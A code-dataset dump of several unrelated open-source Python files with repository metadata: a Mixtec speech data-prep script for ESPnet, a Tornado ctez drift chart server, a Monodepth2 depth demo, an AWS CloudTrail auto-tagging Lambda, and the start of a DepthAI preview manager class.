] | 3,666 | 2017-12-14T05:58:50.000Z | 2022-03-31T22:11:49.000Z | egs/yoloxochitl_mixtec/asr1/local/data_prep.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 1,709 | 2017-12-13T01:02:42.000Z | 2022-03-31T11:57:45.000Z | # -*- coding: UTF-8 -*-
from argparse import ArgumentParser
import os
import re
import shutil
import soundfile as sf
import string
import sys
from xml.dom.minidom import parse
s = "".join(chr(c) for c in range(sys.maxunicode + 1))
ws = "".join(re.findall(r"\s", s))
outtab = " " * len(ws)
trantab = str.maketrans(ws, outtab)
delset = string.punctuation
delset = delset.replace(":", "")
delset = delset.replace("'", "")
def TextRefine(text, text_format=""):
text = re.sub(r"\.\.\.|\*|\[.*?\]", "", text.upper())
delset_specific = delset
if text_format == "underlying_full":
remove_clear = "()=-"
for char in remove_clear:
delset_specific = delset_specific.replace(char, "")
return text.translate(str.maketrans("", "", delset_specific))
def ExtractAudioID(audioname, wav_spk_info=None):
if wav_spk_info:
for key in wav_spk_info.keys():
if key in audioname:
return key
else:
print("ERROR in audioname")
return "error"
def XMLRefine(input_xml, output_xml, readable=False):
if readable:
append = "\n"
else:
append = ""
sample_processing = open(input_xml, "r", encoding="iso-8859-1")
output = open(output_xml, "w", encoding="iso-8859-1")
stack = ""
stack_symbol = ""
while True:
line = sample_processing.readline()
if not line:
break
line = line.strip()
if stack != "":
if len(line) > 1 and line[0] == "<":
if line.startswith("<Who"):
continue
stack += "%s</%s>%s" % (append, stack_symbol, append)
output.write(stack)
if line[-2:] == "/>":
stack = line[:-2] + ">" + append
stack_symbol = line[1:].split(" ")[0]
else:
output.write(line + append)
stack, stack_symbol = "", ""
else:
stack += line
elif len(line) > 2 and line[-2:] == "/>":
stack += line[:-2] + ">" + append
stack_symbol = line[1:].split(" ")[0]
else:
output.write(line + append)
sample_processing.close()
output.close()
def XMLProcessing(transcribe):
DOMTree = parse(transcribe)
trans = DOMTree.documentElement
# get audio file information
if trans.hasAttribute("audio_filename"):
audio_filename = trans.getAttribute("audio_filename")
else:
print("audio_file error for %s" % transcribe)
return
# get speaker information
speaker_info = {}
speakers = trans.getElementsByTagName("Speakers")
if len(speakers) < 1:
print("no speaker found, deal individually")
else:
speakers = speakers[0]
for speaker in speakers.childNodes:
speaker_info[speaker.getAttribute("id")] = {
"name": speaker.getAttribute("name"),
"dialect": speaker.getAttribute("dialect"),
"scope": speaker.getAttribute("scope"),
"accent": speaker.getAttribute("accent"),
}
# process by episode/section/turn/sync
xml_text = []
episodes = trans.getElementsByTagName("Episode")
for episode in episodes:
sections = episode.getElementsByTagName("Section")
for section in sections:
section_list = []
turns = section.getElementsByTagName("Turn")
for turn in turns:
# read as individual speech
raw_speaker = turn.getAttribute("speaker")
if len(raw_speaker.split(" ")) > 1:
# print("continue in %s" % audio_filename)
continue
individual_speech = raw_speaker not in speaker_info.keys()
syncs = turn.getElementsByTagName("Sync")
comments = turn.getElementsByTagName("Comment")
# remove comment nodes
for child in comments:
turn.removeChild(child)
first, last = turn.firstChild, turn.lastChild
for sync in syncs:
text = sync.firstChild
if text is None:
if last.isSameNode(sync) and len(syncs) > 0:
section_list[-1].append(sync.getAttribute("time"))
continue
elif len(sync.childNodes) > 1:
# for combination of speakers
text = ""
for child in sync.childNodes:
text += child.data
else:
text = text.data
text = TextRefine(text)
text = text.translate(trantab)
start_time = sync.getAttribute("time")
if individual_speech:
spk = "None"
else:
spk = turn.getAttribute("speaker")
if first.isSameNode(sync):
if last.isSameNode(sync):
section_list.append(
[spk, text, start_time, turn.getAttribute("endTime")]
)
else:
section_list.append([spk, text, start_time])
else:
section_list[-1].append(start_time)
if last.isSameNode(sync):
section_list.append(
[spk, text, start_time, turn.getAttribute("endTime")]
)
else:
section_list.append([spk, text, start_time])
xml_text.extend(section_list)
for xml in xml_text:
if len(xml) != 4:
print("warning")
print(xml)
return audio_filename, speaker_info, xml_text
def PackZero(number, size=6):
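    """Left-pad a number with zeros to a fixed width, e.g. PackZero(42) -> "000042"."""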
return "0" * (size - len(str(number))) + str(number)
def LoadWavSpeakerInfo(info_file):
"""return dict of wav: spk_list"""
info_file = open(info_file, "r", encoding="utf-8")
raw_info = list(map((lambda x: x.split(",")), (info_file.read()).split("\n")))
wav_spk_info = {}
for mapping in raw_info:
if len(mapping) < 3:
continue
[wav, spk1, spk2] = mapping
wav_spk_info[wav] = [spk1]
if spk2 != "":
wav_spk_info[wav] += [spk2]
return wav_spk_info
def LoadSpeakerDetails(speaker_details):
spk_details = {}
spk_file = open(speaker_details, "r", encoding="utf-8")
content = spk_file.read()
last_names = re.findall(r"\\last_name (.*?)\n", content, re.S)
first_names = re.findall(r"\\first_name (.*?)\n", content, re.S)
codes = re.findall(r"\\code (.*?)\n", content, re.S)
assert len(last_names) == len(first_names) == len(codes)
for last, first, code in zip(last_names, first_names, codes):
spk_details["%s %s" % (" ".join(first.split()), " ".join(last.split()))] = code
return spk_details
def TimeOrderProcess(time_order_dom):
time_order = {}
time_slots = time_order_dom.getElementsByTagName("TIME_SLOT")
for time_slot in time_slots:
        # convert milliseconds to seconds
time_order[time_slot.getAttribute("TIME_SLOT_ID")] = (
float(time_slot.getAttribute("TIME_VALUE")) / 1000
)
return time_order
def ELANProcess(afile, spk_info, spk_details, text_format):
try:
elan_content = parse(afile).documentElement
except Exception:
print("encoding failed %s" % afile)
return None
time_order = TimeOrderProcess(elan_content.getElementsByTagName("TIME_ORDER")[0])
tiers = elan_content.getElementsByTagName("TIER")
channels = ([], [])
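    # one segment list per audio channel: index 0 collects the first speaker's
    # (start, end, text) tuples, index 1 the second speaker's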
for tier in tiers:
if tier.getAttribute("LINGUISTIC_TYPE_REF") not in [
"UtteranceType",
"Transcription",
]:
# only consider pure caption
continue
try:
spk_name = " ".join(tier.getAttribute("TIER_ID").strip().split())
if text_format == "surface":
if "SURFACE" not in spk_name:
continue
code = spk_details[spk_name[:-9]]
else:
if "SURFACE" in spk_name:
continue
code = spk_details[spk_name]
except Exception:
print("error speaker: %s" % tier.getAttribute("TIER_ID").strip())
continue
if code not in spk_info:
continue
channel = channels[spk_info.index(code)]
annotations = tier.getElementsByTagName("ANNOTATION")
for anno in annotations:
info = anno.getElementsByTagName("ALIGNABLE_ANNOTATION")[0]
start = time_order[info.getAttribute("TIME_SLOT_REF1")]
end = time_order[info.getAttribute("TIME_SLOT_REF2")]
text = ""
childs = info.getElementsByTagName("ANNOTATION_VALUE")[0].childNodes
for child in childs:
if child.firstChild is not None:
continue
text += child.firstChild.data
else:
text += child.data
text = TextRefine(text, text_format)
text = text.translate(trantab)
if len(text) < 1:
continue
if start == end:
continue
channel.append([start, end, text])
return channels
def TraverseData(
sound_dir,
annotation_dir,
target_dir,
mode,
speaker_info,
new_data_dir,
speaker_details,
text_format,
):
if not os.path.exists(target_dir):
os.makedirs(target_dir)
segments = open(os.path.join(target_dir, "segments"), "w", encoding="utf-8")
wavscp = open(os.path.join(target_dir, "wav.scp"), "w", encoding="utf-8")
utt2spk = open(os.path.join(target_dir, "utt2spk"), "w", encoding="utf-8")
spk2utt = open(os.path.join(target_dir, "spk2utt"), "w", encoding="utf-8")
text = open(os.path.join(target_dir, "text"), "w", encoding="utf-8")
name2spk = open(os.path.join(target_dir, "name2spk"), "w", encoding="utf-8")
remix_script = open(
os.path.join(target_dir, "remix_script.sh"), "w", encoding="utf-8"
)
# get relationship
sound_files = {}
annotation_files = {}
spk_id = 1
spk2utt_prep = {}
name2spk_prep = {}
if mode == "trs":
if not os.path.exists(os.path.join(target_dir, "temp")):
os.mkdir(os.path.join(target_dir, "temp"))
audio_set = set()
for root, dirs, files in os.walk(sound_dir):
for file in files:
if file[-4:] == ".wav":
sound_files[ExtractAudioID(file)] = os.path.join(root, file)
for root, dirs, files in os.walk(annotation_dir):
for file in files:
if file[-4:] == ".trs":
XMLRefine(
os.path.join(root, file), os.path.join(target_dir, "temp", file)
)
annotation_files[file] = os.path.join(target_dir, "temp", file)
for afile in annotation_files.keys():
if afile == "error":
continue
try:
audio_name, speakers, segment_info = XMLProcessing(
annotation_files[afile]
)
except Exception:
print("error process %s" % annotation_files[afile])
audio_name = audio_name.replace(" ", "")
audio_name = ExtractAudioID(audio_name)
if audio_name in audio_set:
continue
audio_set.add(audio_name)
if "%s.wav" % audio_name not in sound_files.keys():
print("no audio found for annotation: %s" % afile)
continue
# write wav.scp & segments & text files
print(
"%s sox -t wavpcm %s -c 1 -r 16000 -t wavpcm - |"
% (audio_name, sound_files["%s.wav" % audio_name]),
file=wavscp,
)
segment_number = 1
temp_speaker_id = {}
for speaker in speakers.keys():
name2spk_prep[speakers[speaker]["name"]] = name2spk_prep.get(
speakers[speaker]["name"], spk_id
)
temp_speaker_id[speaker] = name2spk_prep[speakers[speaker]["name"]]
if name2spk_prep[speakers[speaker]["name"]] == spk_id:
print(
"%s %s" % (speakers[speaker]["name"], PackZero(spk_id)),
file=name2spk,
)
spk_id += 1
for segment in segment_info:
# segment: [spk, text, start_time, end_time]
if segment[0] == "None":
spk = spk_id
spk_id += 1
else:
spk = temp_speaker_id[segment[0]]
segment_id = "%s_%s_%s" % (
PackZero(spk),
audio_name,
PackZero(segment_number),
)
# skip data error
skip = False
for seg in segment:
if len(seg) < 1:
print("warning segment %s in %s" % (segment_id, audio_name))
skip = True
if skip:
continue
print(
"%s %s %s %s" % (segment_id, audio_name, segment[2], segment[3]),
file=segments,
)
print("%s %s" % (segment_id, PackZero(spk)), file=utt2spk)
print("%s %s" % (segment_id, segment[1]), file=text)
spk2utt_prep[spk] = spk2utt_prep.get(spk, "") + " %s" % (segment_id)
segment_number += 1
for spk in spk2utt_prep.keys():
print("%s %s" % (spk, spk2utt_prep[spk]), file=spk2utt)
print("successfully processing %s" % afile)
shutil.rmtree(os.path.join(target_dir, "temp"))
else:
wav_spk_info = LoadWavSpeakerInfo(speaker_info)
spk_details = LoadSpeakerDetails(speaker_details)
for root, dirs, files in os.walk(sound_dir):
for file in files:
if file[-4:] == ".wav":
sound_files[ExtractAudioID(file, wav_spk_info)] = os.path.join(
root, file
)
for root, dirs, files in os.walk(annotation_dir):
for file in files:
if file[-4:] == ".eaf":
annotation_files[ExtractAudioID(file, wav_spk_info)] = os.path.join(
root, file
)
for afile in annotation_files.keys():
afile_path = annotation_files[afile]
if afile == "error":
continue
spk_info = wav_spk_info[afile]
segment_info = ELANProcess(afile_path, spk_info, spk_details, text_format)
if segment_info is None:
continue
left_channel_segments, right_channel_segments = segment_info
f = sf.SoundFile(sound_files[afile])
max_length = len(f) / f.samplerate
print(
'sox -t wavpcm "%s" -c 1 -r 16000 -t wavpcm %s-L.wav remix 1'
% (sound_files[afile], os.path.join(new_data_dir, afile)),
file=remix_script,
)
print(
"%s-L %s-L.wav" % (afile, os.path.join(new_data_dir, afile)),
file=wavscp,
)
segment_number = 0
for segment in left_channel_segments:
# segments: start end text
segment_id = "%s_%s-L_%s" % (
spk_info[0],
afile,
PackZero(segment_number),
)
if float(segment[1]) > max_length:
continue
print(
"%s %s-L %s %s" % (segment_id, afile, segment[0], segment[1]),
file=segments,
)
print("%s %s" % (segment_id, spk_info[0]), file=utt2spk)
print("%s %s" % (segment_id, segment[2]), file=text)
spk2utt_prep[spk_info[0]] = spk2utt_prep.get(
spk_info[0], ""
) + " %s" % (segment_id)
segment_number += 1
if len(right_channel_segments) > 0:
print(
'sox -t wavpcm "%s" -c 1 -r 16000 -t wavpcm %s-R.wav remix 2'
% (sound_files[afile], os.path.join(new_data_dir, afile)),
file=remix_script,
)
print(
"%s-R %s-R.wav" % (afile, os.path.join(new_data_dir, afile)),
file=wavscp,
)
for segment in right_channel_segments:
# segments: start end text
segment_id = "%s_%s-R_%s" % (
spk_info[1],
afile,
PackZero(segment_number),
)
if float(segment[1]) > max_length:
continue
print(
"%s %s-R %s %s" % (segment_id, afile, segment[0], segment[1]),
file=segments,
)
print("%s %s" % (segment_id, spk_info[1]), file=utt2spk)
print("%s %s" % (segment_id, segment[2]), file=text)
spk2utt_prep[spk_info[1]] = spk2utt_prep.get(
spk_info[1], ""
) + " %s" % (segment_id)
segment_number += 1
print("successfully processing %s" % afile)
for spk in spk2utt_prep.keys():
print("%s %s" % (spk, spk2utt_prep[spk]), file=spk2utt)
segments.close()
wavscp.close()
utt2spk.close()
spk2utt.close()
text.close()
if __name__ == "__main__":
parser = ArgumentParser(description="Process Raw data")
parser.add_argument(
"-w",
dest="wav_path",
type=str,
help="wav path",
default="",
)
parser.add_argument(
"-a",
dest="ann_path",
type=str,
help="annotation path",
default="",
)
parser.add_argument(
"-t", dest="target_dir", type=str, help="target_dir", default="data/mixtec"
)
parser.add_argument(
"-i",
dest="speaker_info",
type=str,
help="speaker info file dir",
default="local/speaker_wav_mapping_mixtec.csv",
)
parser.add_argument(
"-m",
dest="mode",
type=str,
help="transcription type",
default="eaf",
choices=["eaf", "trs"],
)
parser.add_argument(
"-n",
dest="new_data_dir",
type=str,
help="new data directory",
default="remixed",
)
parser.add_argument(
"-d",
dest="speaker_details",
type=str,
help="speaker details (i.e. names to code)",
default="local/Mixtec-consultant-database-unicode_2019-12-25.txt",
)
parser.add_argument(
"-f",
dest="text_format",
type=str,
help="text format",
default="",
choices=["surface", "underlying_full", "underlying_reduced", ""],
)
args = parser.parse_args()
TraverseData(
args.wav_path,
args.ann_path,
args.target_dir,
mode=args.mode,
speaker_info=args.speaker_info,
new_data_dir=args.new_data_dir,
speaker_details=args.speaker_details,
text_format=args.text_format,
)
| 36.019784 | 88 | 0.508963 | 2,112 | 20,027 | 4.65767 | 0.139678 | 0.00488 | 0.020331 | 0.019518 | 0.30121 | 0.235336 | 0.192437 | 0.183999 | 0.17424 | 0.166514 | 0 | 0.012105 | 0.372996 | 20,027 | 555 | 89 | 36.084685 | 0.771283 | 0.023468 | 0 | 0.27439 | 0 | 0.004065 | 0.085637 | 0.004658 | 0 | 0 | 0 | 0 | 0.002033 | 1 | 0.020325 | false | 0 | 0.01626 | 0.002033 | 0.058943 | 0.058943 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91feaf1b3da257c97ae5f3b02d3251782cab6063 | 3,514 | py | Python | drift.py | hclivess/ctez_stats | 45dedc77f7cffb201a0c836c9409cec42fb64eec | [
"MIT"
] | 6 | 2021-10-29T18:20:12.000Z | 2021-12-31T16:06:35.000Z | drift.py | hclivess/ctez_stats | 45dedc77f7cffb201a0c836c9409cec42fb64eec | [
"MIT"
] | 72 | 2021-09-13T13:17:14.000Z | 2022-02-08T16:56:21.000Z | drift.py | hclivess/ctez_stats | 45dedc77f7cffb201a0c836c9409cec42fb64eec | [
"MIT"
] | 12 | 2021-08-31T07:19:50.000Z | 2021-12-10T09:45:21.000Z | import tornado.ioloop
import tornado.web
import drift_collector
import threading
import time
import json
from datetime import datetime
def reduce(whole, reduce_to=1000):
"""reduce number of entries in list by skipping"""
    reducer = max(1, len(whole) // reduce_to)  # guard against a zero step when the list is short
reduced = whole[::reducer]
return reduced
def to_ts(date_strings):
timestamps = []
for key in date_strings:
timestamp = datetime.timestamp(datetime.strptime(key, "%Y-%m-%d %H:%M:%S+00:00"))
timestamps.append(int(timestamp))
return timestamps
class ChartHandler(tornado.web.RequestHandler):
def get(self, data):
chart = ChartHandler.get_argument(self, "chart")
start = ChartHandler.get_argument(self, "start")
end = ChartHandler.get_argument(self, "end")
resolution = ChartHandler.get_argument(self, "resolution")
input_dict = drift_collector.read_input()
maximum = input_dict["stats"]["last_block"]
if end == "max":
end = maximum
if start == "min":
start = 1793972 # contract origination
        if int(start) < 0:  # if a negative number is used, subtract it from maximum
            start = maximum + int(start)
        start, end = int(start), int(end)  # coerce to int so the comparisons below are type-safe
        if start < 1793972:  # prevent oor operation (clamp to contract origination)
            start = 1793972
        if end > maximum:  # prevent oor operation
            end = maximum
        block_range = list(range(start, end + 1))  # +1 to include end in range
value_list = []
for key, value in input_dict["data"].items():
if int(start) <= int(key) <= int(end):
value_list.append(value[chart])
if resolution != "max":
if int(resolution) > int(end) - start:
resolution = int(end) - start
if resolution != "max" and int(resolution) <= 0:
resolution = 1
if resolution == "max":
resolution = len(block_range)
values = reduce(list(value_list), int(resolution))
labels = reduce(list(block_range), int(resolution))
self.render("chart.html",
labels=json.dumps(labels),
values=json.dumps(values),
title=chart
)
class ApiHandler(tornado.web.RequestHandler):
def get(self):
self.write(drift_collector.read_input())
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("dashboard.html")
def make_app():
return tornado.web.Application([
(r"/", MainHandler),
(r"/api", ApiHandler),
(r"/chart(.*)", ChartHandler),
(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "static"}),
(r'/(favicon.ico)', tornado.web.StaticFileHandler, {"path": "static"}),
])
class ThreadedClient(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
while True:
try:
drift_collector.collect(block_last=drift_collector.block_last_get(),
block_start=drift_collector.block_start_get())
print("Sleeping...")
time.sleep(10)
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
background = ThreadedClient()
background.start()
print("Background process started")
app = make_app()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
| 29.779661 | 98 | 0.593625 | 391 | 3,514 | 5.204604 | 0.332481 | 0.034398 | 0.045209 | 0.053071 | 0.090418 | 0.054054 | 0.037346 | 0 | 0 | 0 | 0 | 0.01627 | 0.282869 | 3,514 | 117 | 99 | 30.034188 | 0.79127 | 0.060615 | 0 | 0.068966 | 0 | 0 | 0.066849 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091954 | false | 0 | 0.08046 | 0.011494 | 0.252874 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6205bfcc1dd448dd56cf8db5404490df7dab8b66 | 7,947 | py | Python | scripts/depth/demo.py | Kh4L/gluon-cv | 849411ed56632cd854850b07142087d599f97dcb | [
"Apache-2.0"
] | 5,447 | 2018-04-25T18:02:51.000Z | 2022-03-31T00:59:49.000Z | scripts/depth/demo.py | Kh4L/gluon-cv | 849411ed56632cd854850b07142087d599f97dcb | [
"Apache-2.0"
] | 1,566 | 2018-04-25T21:14:04.000Z | 2022-03-31T06:42:42.000Z | scripts/depth/demo.py | Kh4L/gluon-cv | 849411ed56632cd854850b07142087d599f97dcb | [
"Apache-2.0"
] | 1,345 | 2018-04-25T18:44:13.000Z | 2022-03-30T19:32:53.000Z | import os
import argparse
import time
import PIL.Image as pil
import numpy as np
import mxnet as mx
from mxnet.gluon.data.vision import transforms
import gluoncv
from gluoncv.model_zoo.monodepthv2.layers import disp_to_depth
import matplotlib as mpl
import matplotlib.cm as cm
import cv2
# using cpu
ctx = mx.cpu(0)
def parse_args():
"""Training Options for Depth Prediction Experiments"""
parser = argparse.ArgumentParser(description='MXNet Gluon Monodepth2 Demo')
# model and dataset
parser.add_argument('--model_zoo', type=str,
choices=['monodepth2_resnet18_kitti_stereo_640x192',
'monodepth2_resnet18_kitti_mono_640x192',
'monodepth2_resnet18_kitti_mono_stereo_640x192'],
default='monodepth2_resnet18_kitti_mono_stereo_640x192',
help='choose depth model from model zoo model')
parser.add_argument('--input_format', type=str,
choices=['image', 'video'], default='image',
help='choose the format of input data')
parser.add_argument("--data_path", type=str, help="path to the data")
parser.add_argument("--height", type=int, help="input image height", default=192)
parser.add_argument("--width", type=int, help="input image width", default=640)
parser.add_argument('--prediction_only', action="store_true",
help='if true, just store pure prediction results')
parser.add_argument('--use_depth', action="store_true",
help='use depth map as prediction results')
parser.add_argument('--output_format', type=str,
choices=['image', 'video'], default='video',
help='choose the format of output')
parser.add_argument("--output_path", type=str, help="path to store the results",
default=os.path.join(os.path.expanduser("."), "tmp"))
# the parser
args = parser.parse_args()
return args
def read_img(files, data_path):
raw_img_sequences = []
for file in files:
file = os.path.join(data_path, file)
img = pil.open(file).convert('RGB')
raw_img_sequences.append(img)
original_width, original_height = raw_img_sequences[0].size
return raw_img_sequences, original_width, original_height
def read_video(data_path):
raw_img_sequences = []
files = []
frame_index = 0
cap = cv2.VideoCapture(data_path)
while cap.isOpened():
ret, frame = cap.read()
# if frame is read correctly ret is True
if not ret:
print("Can't receive frame (stream end?). Exiting ...")
break
img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
img = pil.fromarray(img)
raw_img_sequences.append(img)
f_str = "{:010d}.png".format(frame_index)
files.append(f_str)
frame_index += 1
if cv2.waitKey(1) == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
original_width, original_height = raw_img_sequences[0].size
return raw_img_sequences, files, original_width, original_height
if __name__ == '__main__':
args = parse_args()
############################ Loading Data ############################
print("Loading Data......")
tic = time.time()
if args.input_format == 'image':
assert os.path.isdir(args.data_path), \
"--data_path must be a direction when input_format is 'image'"
files = os.listdir(args.data_path)
files.sort()
raw_img_sequences, original_width, original_height = \
read_img(files=files, data_path=args.data_path)
elif args.input_format == 'video':
assert os.path.isfile(args.data_path), \
"--data_path must be a video file when input_format is 'video'"
raw_img_sequences, files, original_width, original_height = \
read_video(data_path=args.data_path)
feed_height = args.height
feed_width = args.width
t_consuming = time.time() - tic
print("Data loaded! Time consuming: {:0.3f}s\n".format(t_consuming))
############################ Prepare Models and Prediction ############################
print("Loading Model and Prediction......")
tic = time.time()
    # when using a stereo or mono+stereo model, the prediction can be scaled to real depth values
min_depth = 0.1
max_depth = 100
scale_factor = 5.4
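    # 5.4 is the usual monodepth2 stereo scaling convention: stereo supervision assumes a
    # 0.1-unit baseline while KITTI's rig has a ~54 cm baseline, so predicted depth is scaled up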
MIN_DEPTH = 1e-3
MAX_DEPTH = 80
model = gluoncv.model_zoo.get_model(args.model_zoo,
pretrained_base=False, ctx=ctx, pretrained=True)
pred_sequences = []
for img in raw_img_sequences:
img = img.resize((feed_width, feed_height), pil.LANCZOS)
img = transforms.ToTensor()(mx.nd.array(img)).expand_dims(0).as_in_context(context=ctx)
outputs = model.predict(img)
mx.nd.waitall()
pred_disp, _ = disp_to_depth(outputs[("disp", 0)], min_depth, max_depth)
t = time.time()
pred_disp = pred_disp.squeeze().as_in_context(mx.cpu()).asnumpy()
pred_disp = cv2.resize(src=pred_disp, dsize=(original_width, original_height))
pred_depth = 1 / pred_disp
if args.model_zoo != 'monodepth2_resnet18_kitti_mono_640x192':
pred_depth *= scale_factor
pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH
pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH
if args.use_depth:
pred_sequences.append(pred_depth)
else:
pred_sequences.append(pred_disp)
t_consuming = time.time() - tic
print("Finished prediction! Time consuming: {:0.3f}s\n".format(t_consuming))
############################ Visualization & Store Videos ############################
print("Visualization and Store Results......")
tic = time.time()
if args.prediction_only:
pred_path = os.path.join(args.output_path, 'pred')
if not os.path.exists(pred_path):
os.makedirs(pred_path)
for pred, file in zip(pred_sequences, files):
pred_out_file = os.path.join(pred_path, file)
cv2.imwrite(pred_out_file, pred)
else:
rgb_path = os.path.join(args.output_path, 'rgb')
if not os.path.exists(rgb_path):
os.makedirs(rgb_path)
output_sequences = []
for raw_img, pred, file in zip(raw_img_sequences, pred_sequences, files):
vmax = np.percentile(pred, 95)
normalizer = mpl.colors.Normalize(vmin=pred.min(), vmax=vmax)
mapper = cm.ScalarMappable(norm=normalizer, cmap='magma')
colormapped_im = (mapper.to_rgba(pred)[:, :, :3] * 255).astype(np.uint8)
im = pil.fromarray(colormapped_im)
raw_img = np.array(raw_img)
pred = np.array(im)
output = np.concatenate((raw_img, pred), axis=0)
output_sequences.append(output)
if args.output_format == 'image':
pred_out_file = os.path.join(rgb_path, file)
cv2.imwrite(pred_out_file, cv2.cvtColor(pred, cv2.COLOR_RGB2BGR))
if args.output_format == 'video':
width = int(output_sequences[0].shape[1] + 0.5)
height = int(output_sequences[0].shape[0] + 0.5)
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(
os.path.join(args.output_path, 'demo.mp4'), fourcc, 20.0, (width, height))
for frame in output_sequences:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
out.write(frame)
cv2.imshow('demo', frame)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
out.release()
cv2.destroyAllWindows()
t_consuming = time.time() - tic
print("Finished! Time consuming: {:0.3f}s".format(t_consuming))
| 35.797297 | 95 | 0.606644 | 993 | 7,947 | 4.642497 | 0.229607 | 0.020824 | 0.039046 | 0.040998 | 0.309328 | 0.190022 | 0.143601 | 0.073102 | 0.044252 | 0.029501 | 0 | 0.021635 | 0.261356 | 7,947 | 221 | 96 | 35.959276 | 0.763714 | 0.034101 | 0 | 0.118012 | 0 | 0 | 0.146325 | 0.027478 | 0 | 0 | 0.000534 | 0 | 0.012422 | 1 | 0.018634 | false | 0 | 0.074534 | 0 | 0.111801 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620832d92d4d07ef75358e205a0f28656dce526b | 899 | py | Python | tat_aws_creator_auto_tag/handlers/tag_resource.py | techantllc/aws-creator-auto-tagger | 413c9f6c91cfaa088bbc45bed0f6c9f09e02f48a | [
"MIT"
] | null | null | null | tat_aws_creator_auto_tag/handlers/tag_resource.py | techantllc/aws-creator-auto-tagger | 413c9f6c91cfaa088bbc45bed0f6c9f09e02f48a | [
"MIT"
] | null | null | null | tat_aws_creator_auto_tag/handlers/tag_resource.py | techantllc/aws-creator-auto-tagger | 413c9f6c91cfaa088bbc45bed0f6c9f09e02f48a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import gzip
import json
from tat_aws_creator_auto_tag.boto_ses import boto_ses
from tat_aws_creator_auto_tag.events import EventName, RecordParser, ResourceNotSupportedError
from tat_aws_creator_auto_tag.logger import logger
s3_client = boto_ses.client("s3")
def handler(event, context):
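    # Triggered by an S3 put of a gzipped CloudTrail log object: pull the bucket
    # and key out of the event, download and decompress the log, then tag every
    # resource-creating API call it contains.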
bucket_name = event["Records"][0]["s3"]["bucket"]["name"]
object_key = event["Records"][0]["s3"]["object"]["key"]
res_get_object = s3_client.get_object(
Bucket=bucket_name, Key=object_key
)
content = res_get_object["Body"].read()
cloudtrail_data = json.loads(gzip.decompress(content).decode("utf-8"))
for record in cloudtrail_data["Records"]:
if RecordParser.is_create_event(record):
try:
EventName.tag_it(record, boto_ses, verbose=True)
except ResourceNotSupportedError as _:
pass
| 33.296296 | 94 | 0.695217 | 118 | 899 | 5.016949 | 0.457627 | 0.047297 | 0.050676 | 0.086149 | 0.121622 | 0.121622 | 0 | 0 | 0 | 0 | 0 | 0.012295 | 0.185762 | 899 | 26 | 95 | 34.576923 | 0.796448 | 0.023359 | 0 | 0 | 0 | 0 | 0.062785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0.05 | 0.25 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62086a659812b4cdfdb304e187e0dcc22714aad3 | 9,964 | py | Python | depthai_sdk/src/depthai_sdk/managers/preview_manager.py | crisdeodates/AI-depthai | e27c75ae26d91556b6c9bd0ac3481bfde4a40b39 | [
"MIT"
] | null | null | null | depthai_sdk/src/depthai_sdk/managers/preview_manager.py | crisdeodates/AI-depthai | e27c75ae26d91556b6c9bd0ac3481bfde4a40b39 | [
"MIT"
] | null | null | null | depthai_sdk/src/depthai_sdk/managers/preview_manager.py | crisdeodates/AI-depthai | e27c75ae26d91556b6c9bd0ac3481bfde4a40b39 | [
"MIT"
] | null | null | null | import math
import cv2
import depthai as dai
from ..previews import Previews, MouseClickTracker
class PreviewManager:
"""
Manager class that handles frames and displays them correctly.
"""
#: dict: Contains name -> frame mapping that can be used to modify specific frames directly
frames = {}
def __init__(self, display=[], nnSource=None, colorMap=cv2.COLORMAP_JET, depthConfig=None, dispMultiplier=255/96, mouseTracker=False, lowBandwidth=False, scale=None, sync=False, fpsHandler=None, createWindows=True):
"""
Args:
display (list, Optional): List of :obj:`depthai_sdk.Previews` objects representing the streams to display
mouseTracker (bool, Optional): If set to :code:`True`, will enable mouse tracker on the preview windows that will display selected pixel value
fpsHandler (depthai_sdk.fps.FPSHandler, Optional): if provided, will use fps handler to modify stream FPS and display it
sync (bool, Optional): If set to :code:`True`, will assume that neural network source camera will not contain raw frame but scaled frame used by NN
nnSource (str, Optional): Specifies NN source camera
colorMap (cv2 color map, Optional): Color map applied on the depth frames
lowBandwidth (bool, Optional): If set to :code:`True`, will decode the received frames assuming they were encoded with MJPEG encoding
            scale (dict, Optional): Allows scaling down frames before preview. Useful when previewing e.g. 4K frames
